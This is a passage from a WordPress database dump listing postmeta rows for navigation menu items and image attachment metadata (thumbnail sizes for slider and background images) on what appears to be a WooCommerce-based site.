(9207,4528,'_menu_item_menu_item_parent','4383'),(9208,4528,'_menu_item_object_id','2667'),(9209,4528,'_menu_item_object','page'),(9210,4528,'_menu_item_target',''),(9211,4528,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9212,4528,'_menu_item_xfn',''),(9213,4528,'_menu_item_url',''),(9214,4529,'_menu_item_type','post_type'),(9215,4529,'_menu_item_menu_item_parent','4381'),(9216,4529,'_menu_item_object_id','2676'),(9217,4529,'_menu_item_object','page'),(9218,4529,'_menu_item_target',''),(9219,4529,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9220,4529,'_menu_item_xfn',''),(9221,4529,'_menu_item_url',''),(9222,4530,'_menu_item_type','post_type'),(9223,4530,'_menu_item_menu_item_parent','4381'),(9224,4530,'_menu_item_object_id','2689'),(9225,4530,'_menu_item_object','page'),(9226,4530,'_menu_item_target',''),(9227,4530,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9228,4530,'_menu_item_xfn',''),(9229,4530,'_menu_item_url',''),(9230,4531,'_menu_item_type','post_type'),(9231,4531,'_menu_item_menu_item_parent','4382'),(9232,4531,'_menu_item_object_id','2700'),(9233,4531,'_menu_item_object','page'),(9234,4531,'_menu_item_target',''),(9235,4531,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9236,4531,'_menu_item_xfn',''),(9237,4531,'_menu_item_url',''),(9238,4532,'_menu_item_type','post_type'),(9239,4532,'_menu_item_menu_item_parent','4382'),(9240,4532,'_menu_item_object_id','2705'),(9241,4532,'_menu_item_object','page'),(9242,4532,'_menu_item_target',''),(9243,4532,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9244,4532,'_menu_item_xfn',''),(9245,4532,'_menu_item_url',''),(9246,4533,'_menu_item_type','post_type'),(9247,4533,'_menu_item_menu_item_parent','4382'),(9248,4533,'_menu_item_object_id','2716'),(9249,4533,'_menu_item_object','page'),(9250,4533,'_menu_item_target',''),(9251,4533,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9252,4533,'_menu_item_xfn',''),(9253,4533,'_menu_item_url',''),(9254,4534,'_menu_item_type','post_type'),(9255,4534,'_menu_item_menu_item_parent','4351'),(9256,4534,'_menu_item_object_id','1117'),(9257,4534,'_menu_item_object','page'),(9258,4534,'_menu_item_target',''),(9259,4534,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9260,4534,'_menu_item_xfn',''),(9261,4534,'_menu_item_url',''),(9262,4535,'_menu_item_type','post_type'),(9263,4535,'_menu_item_menu_item_parent','4380'),(9264,4535,'_menu_item_object_id','1700'),(9265,4535,'_menu_item_object','page'),(9266,4535,'_menu_item_target',''),(9267,4535,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9268,4535,'_menu_item_xfn',''),(9269,4535,'_menu_item_url',''),(9270,4536,'_menu_item_type','post_type'),(9271,4536,'_menu_item_menu_item_parent','4380'),(9272,4536,'_menu_item_object_id','1684'),(9273,4536,'_menu_item_object','page'),(9274,4536,'_menu_item_target',''),(9275,4536,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9276,4536,'_menu_item_xfn',''),(9277,4536,'_menu_item_url',''),(9278,4537,'_menu_item_type','post_type'),(9279,4537,'_menu_item_menu_item_parent','4380'),(9280,4537,'_menu_item_object_id','1438'),(9281,4537,'_menu_item_object','portfolio-item'),(9282,4537,'_menu_item_target',''),(9283,4537,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9284,4537,'_menu_item_xfn',''),(9285,4537,'_menu_item_url',''),(9286,4538,'_menu_item_type','post_type'),(9287,4538,'_menu_item_menu_item_parent','4378'),(9288,4538,'_menu_item_object_id','664'),(9289,4538,'_menu_item_object','page'),(9290,4538,'_menu_item_target',''),(9291,4538,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9292,4538,'_menu_item_xfn',''),(9293,4538,'_menu_item_url',''),(9294,4539,'_menu_item_type','post_type'),(9295,4539,'_menu_item_menu_item_parent','4378'),(9296,4539,'_menu_item_object_id','850'),(9297,4539,'_menu_item_object','page'),(9298,4539,'_menu_item_target',''),(9299,4539,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9300,4539,'_menu_item_xfn',''),(9301,4539,'_menu_item_url',''),(9302,4540,'_menu_item_type','post_type'),(9303,4540,'_menu_item_menu_item_parent','4378'),(9304,4540,'_menu_item_object_id','668'),(9305,4540,'_menu_item_object','post'),(9306,4540,'_menu_item_target',''),(9307,4540,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9308,4540,'_menu_item_xfn',''),(9309,4540,'_menu_item_url',''),(9310,4541,'_menu_item_type','post_type'),(9311,4541,'_menu_item_menu_item_parent','4379'),(9312,4541,'_menu_item_object_id','6'),(9313,4541,'_menu_item_object','page'),(9314,4541,'_menu_item_target',''),(9315,4541,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9316,4541,'_menu_item_xfn',''),(9317,4541,'_menu_item_url',''),(9318,4542,'_menu_item_type','post_type'),(9319,4542,'_menu_item_menu_item_parent','4379'),(9320,4542,'_menu_item_object_id','1058'),(9321,4542,'_menu_item_object','page'),(9322,4542,'_menu_item_target',''),(9323,4542,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9324,4542,'_menu_item_xfn',''),(9325,4542,'_menu_item_url',''),(9326,4543,'_menu_item_type','post_type'),(9327,4543,'_menu_item_menu_item_parent','4379'),(9328,4543,'_menu_item_object_id','1080'),(9329,4543,'_menu_item_object','product'),(9330,4543,'_menu_item_target',''),(9331,4543,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9332,4543,'_menu_item_xfn',''),(9333,4543,'_menu_item_url',''),(9334,4544,'_menu_item_type','post_type'),(9335,4544,'_menu_item_menu_item_parent','4385'),(9336,4544,'_menu_item_object_id','1730'),(9337,4544,'_menu_item_object','page'),(9338,4544,'_menu_item_target',''),(9339,4544,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9340,4544,'_menu_item_xfn',''),(9341,4544,'_menu_item_url',''),(9342,4545,'_menu_item_type','post_type'),(9343,4545,'_menu_item_menu_item_parent','4385'),(9344,4545,'_menu_item_object_id','1700'),(9345,4545,'_menu_item_object','page'),(9346,4545,'_menu_item_target',''),(9347,4545,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9348,4545,'_menu_item_xfn',''),(9349,4545,'_menu_item_url',''),(9350,4546,'_menu_item_type','post_type'),(9351,4546,'_menu_item_menu_item_parent','4385'),(9352,4546,'_menu_item_object_id','1438'),(9353,4546,'_menu_item_object','portfolio-item'),(9354,4546,'_menu_item_target',''),(9355,4546,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9356,4546,'_menu_item_xfn',''),(9357,4546,'_menu_item_url',''),(9358,4547,'_menu_item_type','post_type'),(9359,4547,'_menu_item_menu_item_parent','4364'),(9360,4547,'_menu_item_object_id','2037'),(9361,4547,'_menu_item_object','page'),(9362,4547,'_menu_item_target',''),(9363,4547,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9364,4547,'_menu_item_xfn',''),(9365,4547,'_menu_item_url',''),(9366,4548,'_menu_item_type','post_type'),(9367,4548,'_menu_item_menu_item_parent','4363'),(9368,4548,'_menu_item_object_id','3382'),(9369,4548,'_menu_item_object','page'),(9370,4548,'_menu_item_target',''),(9371,4548,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9372,4548,'_menu_item_xfn',''),(9373,4548,'_menu_item_url',''),(9374,4549,'_menu_item_type','post_type'),(9375,4549,'_menu_item_menu_item_parent','4351'),(9376,4549,'_menu_item_object_id','3382'),(9377,4549,'_menu_item_object','page'),(9378,4549,'_menu_item_target','_blank'),(9379,4549,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9380,4549,'_menu_item_xfn',''),(9381,4549,'_menu_item_url',''),(9382,4550,'_menu_item_type','post_type'),(9383,4550,'_menu_item_menu_item_parent','4383'),(9384,4550,'_menu_item_object_id','3779'),(9385,4550,'_menu_item_object','page'),(9386,4550,'_menu_item_target',''),(9387,4550,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9388,4550,'_menu_item_xfn',''),(9389,4550,'_menu_item_url',''),(9390,4551,'_menu_item_type','post_type'),(9391,4551,'_menu_item_menu_item_parent','4386'),(9392,4551,'_menu_item_object_id','3776'),(9393,4551,'_menu_item_object','page'),(9394,4551,'_menu_item_target',''),(9395,4551,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9396,4551,'_menu_item_xfn',''),(9397,4551,'_menu_item_url',''),(9398,4552,'_menu_item_type','post_type'),(9399,4552,'_menu_item_menu_item_parent','4386'),(9400,4552,'_menu_item_object_id','3772'),(9401,4552,'_menu_item_object','page'),(9402,4552,'_menu_item_target',''),(9403,4552,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9404,4552,'_menu_item_xfn',''),(9405,4552,'_menu_item_url',''),(9406,4553,'_menu_item_type','post_type'),(9407,4553,'_menu_item_menu_item_parent','4386'),(9408,4553,'_menu_item_object_id','2143'),(9409,4553,'_menu_item_object','post'),(9410,4553,'_menu_item_target',''),(9411,4553,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9412,4553,'_menu_item_xfn',''),(9413,4553,'_menu_item_url',''),(9438,4557,'_menu_item_type','post_type'),(9439,4557,'_menu_item_menu_item_parent','4389'),(9440,4557,'_menu_item_object_id','1338'),(9441,4557,'_menu_item_object','page'),(9442,4557,'_menu_item_target',''),(9443,4557,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9444,4557,'_menu_item_xfn',''),(9445,4557,'_menu_item_url',''),(9446,4558,'_menu_item_type','post_type'),(9447,4558,'_menu_item_menu_item_parent','4389'),(9448,4558,'_menu_item_object_id','2098'),(9449,4558,'_menu_item_object','page'),(9450,4558,'_menu_item_target',''),(9451,4558,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9452,4558,'_menu_item_xfn',''),(9453,4558,'_menu_item_url',''),(9454,4559,'_menu_item_type','post_type'),(9455,4559,'_menu_item_menu_item_parent','4389'),(9456,4559,'_menu_item_object_id','2105'),(9457,4559,'_menu_item_object','page'),(9458,4559,'_menu_item_target',''),(9459,4559,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9460,4559,'_menu_item_xfn',''),(9461,4559,'_menu_item_url',''),(9462,4560,'_menu_item_type','post_type'),(9463,4560,'_menu_item_menu_item_parent','4389'),(9464,4560,'_menu_item_object_id','2676'),(9465,4560,'_menu_item_object','page'),(9466,4560,'_menu_item_target',''),(9467,4560,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9468,4560,'_menu_item_xfn',''),(9469,4560,'_menu_item_url',''),(9470,4561,'_menu_item_type','post_type'),(9471,4561,'_menu_item_menu_item_parent','4389'),(9472,4561,'_menu_item_object_id','2689'),(9473,4561,'_menu_item_object','page'),(9474,4561,'_menu_item_target',''),(9475,4561,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9476,4561,'_menu_item_xfn',''),(9477,4561,'_menu_item_url',''),(9478,4562,'_menu_item_type','post_type'),(9479,4562,'_menu_item_menu_item_parent','4389'),(9480,4562,'_menu_item_object_id','2635'),(9481,4562,'_menu_item_object','page'),(9482,4562,'_menu_item_target',''),(9483,4562,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9484,4562,'_menu_item_xfn',''),(9485,4562,'_menu_item_url',''),(9494,4564,'_menu_item_type','post_type'),(9495,4564,'_menu_item_menu_item_parent','4390'),(9496,4564,'_menu_item_object_id','2217'),(9497,4564,'_menu_item_object','page'),(9498,4564,'_menu_item_target',''),(9499,4564,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9500,4564,'_menu_item_xfn',''),(9501,4564,'_menu_item_url',''),(9502,4565,'_menu_item_type','post_type'),(9503,4565,'_menu_item_menu_item_parent','4390'),(9504,4565,'_menu_item_object_id','2651'),(9505,4565,'_menu_item_object','page'),(9506,4565,'_menu_item_target',''),(9507,4565,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9508,4565,'_menu_item_xfn',''),(9509,4565,'_menu_item_url',''),(9510,4566,'_menu_item_type','post_type'),(9511,4566,'_menu_item_menu_item_parent','4390'),(9512,4566,'_menu_item_object_id','2700'),(9513,4566,'_menu_item_object','page'),(9514,4566,'_menu_item_target',''),(9515,4566,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9516,4566,'_menu_item_xfn',''),(9517,4566,'_menu_item_url',''),(9518,4567,'_menu_item_type','post_type'),(9519,4567,'_menu_item_menu_item_parent','4390'),(9520,4567,'_menu_item_object_id','2705'),(9521,4567,'_menu_item_object','page'),(9522,4567,'_menu_item_target',''),(9523,4567,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9524,4567,'_menu_item_xfn',''),(9525,4567,'_menu_item_url',''),(9526,4568,'_menu_item_type','post_type'),(9527,4568,'_menu_item_menu_item_parent','4390'),(9528,4568,'_menu_item_object_id','2716'),(9529,4568,'_menu_item_object','page'),(9530,4568,'_menu_item_target',''),(9531,4568,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9532,4568,'_menu_item_xfn',''),(9533,4568,'_menu_item_url',''),(9534,4569,'_menu_item_type','post_type'),(9535,4569,'_menu_item_menu_item_parent','4391'),(9536,4569,'_menu_item_object_id','2566'),(9537,4569,'_menu_item_object','page'),(9538,4569,'_menu_item_target',''),(9539,4569,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9540,4569,'_menu_item_xfn',''),(9541,4569,'_menu_item_url',''),(9542,4570,'_menu_item_type','post_type'),(9543,4570,'_menu_item_menu_item_parent','4391'),(9544,4570,'_menu_item_object_id','2577'),(9545,4570,'_menu_item_object','page'),(9546,4570,'_menu_item_target',''),(9547,4570,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9548,4570,'_menu_item_xfn',''),(9549,4570,'_menu_item_url',''),(9550,4571,'_menu_item_type','post_type'),(9551,4571,'_menu_item_menu_item_parent','4391'),(9552,4571,'_menu_item_object_id','2620'),(9553,4571,'_menu_item_object','page'),(9554,4571,'_menu_item_target',''),(9555,4571,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9556,4571,'_menu_item_xfn',''),(9557,4571,'_menu_item_url',''),(9558,4572,'_menu_item_type','post_type'),(9559,4572,'_menu_item_menu_item_parent','4391'),(9560,4572,'_menu_item_object_id','2644'),(9561,4572,'_menu_item_object','page'),(9562,4572,'_menu_item_target',''),(9563,4572,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9564,4572,'_menu_item_xfn',''),(9565,4572,'_menu_item_url',''),(9566,4573,'_menu_item_type','post_type'),(9567,4573,'_menu_item_menu_item_parent','4391'),(9568,4573,'_menu_item_object_id','2659'),(9569,4573,'_menu_item_object','page'),(9570,4573,'_menu_item_target',''),(9571,4573,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9572,4573,'_menu_item_xfn',''),(9573,4573,'_menu_item_url',''),(9574,4574,'_menu_item_type','post_type'),(9575,4574,'_menu_item_menu_item_parent','4391'),(9576,4574,'_menu_item_object_id','2667'),(9577,4574,'_menu_item_object','page'),(9578,4574,'_menu_item_target',''),(9579,4574,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9580,4574,'_menu_item_xfn',''),(9581,4574,'_menu_item_url',''),(9582,4575,'_menu_item_type','post_type'),(9583,4575,'_menu_item_menu_item_parent','4392'),(9584,4575,'_menu_item_object_id','2207'),(9585,4575,'_menu_item_object','page'),(9586,4575,'_menu_item_target',''),(9587,4575,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9588,4575,'_menu_item_xfn',''),(9589,4575,'_menu_item_url',''),(9590,4576,'_menu_item_type','post_type'),(9591,4576,'_menu_item_menu_item_parent','4392'),(9592,4576,'_menu_item_object_id','2180'),(9593,4576,'_menu_item_object','page'),(9594,4576,'_menu_item_target',''),(9595,4576,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9596,4576,'_menu_item_xfn',''),(9597,4576,'_menu_item_url',''),(9598,4577,'_menu_item_type','post_type'),(9599,4577,'_menu_item_menu_item_parent','4392'),(9600,4577,'_menu_item_object_id','2593'),(9601,4577,'_menu_item_object','page'),(9602,4577,'_menu_item_target',''),(9603,4577,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9604,4577,'_menu_item_xfn',''),(9605,4577,'_menu_item_url',''),(9606,4578,'_menu_item_type','post_type'),(9607,4578,'_menu_item_menu_item_parent','4392'),(9608,4578,'_menu_item_object_id','2611'),(9609,4578,'_menu_item_object','page'),(9610,4578,'_menu_item_target',''),(9611,4578,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9612,4578,'_menu_item_xfn',''),(9613,4578,'_menu_item_url',''),(9614,4579,'_menu_item_type','post_type'),(9615,4579,'_menu_item_menu_item_parent','4392'),(9616,4579,'_menu_item_object_id','2630'),(9617,4579,'_menu_item_object','page'),(9618,4579,'_menu_item_target',''),(9619,4579,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9620,4579,'_menu_item_xfn',''),(9621,4579,'_menu_item_url',''),(9622,4580,'_menu_item_type','post_type'),(9623,4580,'_menu_item_menu_item_parent','4393'),(9624,4580,'_menu_item_object_id','3776'),(9625,4580,'_menu_item_object','page'),(9626,4580,'_menu_item_target',''),(9627,4580,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9628,4580,'_menu_item_xfn',''),(9629,4580,'_menu_item_url',''),(9630,4581,'_menu_item_type','post_type'),(9631,4581,'_menu_item_menu_item_parent','4393'),(9632,4581,'_menu_item_object_id','3772'),(9633,4581,'_menu_item_object','page'),(9634,4581,'_menu_item_target',''),(9635,4581,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9636,4581,'_menu_item_xfn',''),(9637,4581,'_menu_item_url',''),(9638,4582,'_menu_item_type','post_type'),(9639,4582,'_menu_item_menu_item_parent','4393'),(9640,4582,'_menu_item_object_id','2143'),(9641,4582,'_menu_item_object','post'),(9642,4582,'_menu_item_target',''),(9643,4582,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9644,4582,'_menu_item_xfn',''),(9645,4582,'_menu_item_url',''),(9646,4583,'_menu_item_type','post_type'),(9647,4583,'_menu_item_menu_item_parent','4394'),(9648,4583,'_menu_item_object_id','3776'),(9649,4583,'_menu_item_object','page'),(9650,4583,'_menu_item_target',''),(9651,4583,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9652,4583,'_menu_item_xfn',''),(9653,4583,'_menu_item_url',''),(9654,4584,'_menu_item_type','post_type'),(9655,4584,'_menu_item_menu_item_parent','4394'),(9656,4584,'_menu_item_object_id','3772'),(9657,4584,'_menu_item_object','page'),(9658,4584,'_menu_item_target',''),(9659,4584,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9660,4584,'_menu_item_xfn',''),(9661,4584,'_menu_item_url',''),(9662,4585,'_menu_item_type','post_type'),(9663,4585,'_menu_item_menu_item_parent','4394'),(9664,4585,'_menu_item_object_id','2143'),(9665,4585,'_menu_item_object','post'),(9666,4585,'_menu_item_target',''),(9667,4585,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9668,4585,'_menu_item_xfn',''),(9669,4585,'_menu_item_url',''),(9678,4587,'_menu_item_type','post_type'),(9679,4587,'_menu_item_menu_item_parent','4392'),(9680,4587,'_menu_item_object_id','4125'),(9681,4587,'_menu_item_object','page'),(9682,4587,'_menu_item_target',''),(9683,4587,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9684,4587,'_menu_item_xfn',''),(9685,4587,'_menu_item_url',''),(9686,4588,'_menu_item_type','post_type'),(9687,4588,'_menu_item_menu_item_parent','4384'),(9688,4588,'_menu_item_object_id','4125'),(9689,4588,'_menu_item_object','page'),(9690,4588,'_menu_item_target',''),(9691,4588,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9692,4588,'_menu_item_xfn',''),(9693,4588,'_menu_item_url',''),(9694,4589,'_wp_attached_file','revslider/landing-cimet-img-71.png'),(9695,4589,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:186;s:6:\"height\";i:394;s:4:\"file\";s:34:\"revslider/landing-cimet-img-71.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-cimet-img-71-186x300.png\";s:5:\"width\";i:186;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-142x300.png\";s:5:\"width\";i:142;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-186x300.png\";s:5:\"width\";i:186;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-186x240.png\";s:5:\"width\";i:186;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"landing-cimet-img-71-186x300.png\";s:5:\"width\";i:186;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-cimet-img-71-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9696,4590,'_wp_attached_file','revslider/recept-11.png'),(9697,4590,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:552;s:6:\"height\";i:657;s:4:\"file\";s:23:\"revslider/recept-11.png\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"recept-11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"recept-11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"recept-11-252x300.png\";s:5:\"width\";i:252;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"recept-11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"recept-11-552x300.png\";s:5:\"width\";i:552;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"recept-11-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"recept-11-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"recept-11-552x550.png\";s:5:\"width\";i:552;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"recept-11-550x657.png\";s:5:\"width\";i:550;s:6:\"height\";i:657;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"recept-11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"recept-11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9698,4591,'_wp_attached_file','revslider/pozadina-1-scaled.jpg'),(9699,4591,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2560;s:6:\"height\";i:1723;s:4:\"file\";s:31:\"revslider/pozadina-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"pozadina-1-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"pozadina-1-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"pozadina-1-scaled-600x404.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"pozadina-1-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"pozadina-1-1024x689.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:689;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"pozadina-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"pozadina-1-768x517.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:517;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"pozadina-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"pozadina-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"pozadina-1-1536x1034.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1034;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:24:\"pozadina-1-2048x1378.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1378;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"pozadina-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"pozadina-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:23:\"pozadina-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:24:\"pozadina-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"pozadina-1-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"pozadina-1-scaled-600x404.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"pozadina-1-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";